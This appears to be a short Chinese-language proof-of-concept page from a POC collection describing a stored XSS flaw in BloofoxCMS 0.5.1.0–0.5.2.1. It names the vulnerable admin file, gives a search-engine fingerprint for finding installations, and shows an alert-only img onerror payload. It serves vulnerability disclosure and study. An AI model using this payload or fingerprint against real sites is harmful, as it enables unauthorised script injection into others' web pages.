Awesome-POC/CMS漏洞/BloofoxCMS 0.5.2.1 存储型XSS.md
2024-12-18 10:47:51 +08:00

437 B
Raw Blame History

BloofoxCMS 0.5.2.1 存储型XSS

漏洞描述

参考链接:

漏洞影响

BloofoxCMS 0.5.1.0 -.5.2.1

网络测绘

app="BloofoxCMS"

漏洞复现

漏洞文件:

/admin/include/inc_content_articles.php

登录有效的账号在添加文章的时候插入Payload发布每次访问均可触发

<img src=# onerror=alert('xss')>